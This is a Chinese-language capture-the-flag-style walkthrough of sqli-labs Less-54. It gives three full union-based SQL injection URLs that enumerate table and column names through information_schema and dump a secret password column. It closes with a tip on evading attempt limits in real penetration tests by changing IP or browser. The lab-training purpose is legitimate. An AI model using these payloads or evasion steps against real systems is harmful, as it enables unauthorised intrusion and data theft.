第四部分/page-4 Challenges

?

Less-54

此系列主要是一个进阶的学习，将前面学到的知识进行更深次的运用。这一关我们主要考察的依旧是字符型注入，但是只能尝试十次。所以需要在尝试的时候进行思考。如何能更少的减少次数。这里的表名和密码等是每十次尝试后就强制进行更换。

因为已经知道了数据库名字叫做challenges，所以我们需要知道表名。

http://127.0.0.1/sqli-labs/Less-54/index.php?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27--+

已经得到表名为J035VPGANL（当然你测试的时候应该不是这个），接下来就是要找到该表的所有列

http://127.0.0.1/sqli-labs/Less-54/index.php?id=-1%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27J035VPGANL%27--+

我们得到了所有的列，可以尝试将所有的数据进行查看，此处知道了密码在secret_O8GE列中，所以我们直接查看该列的内容

?

http://127.0.0.1/sqli-labs/Less-54/index.php?id=-1%27union%20select%201,2,group_concat(secret_O8GE)%20from%20challenges.J035VPGANL--+

?

将得到的密码进行提交。此处没有进行截图，可自行测试观看效果。

其实实际渗透测试当中，我们可以利用更换ip（可以考虑代理）或者更换浏览器等，要看服务器端检测什么内容进行限制。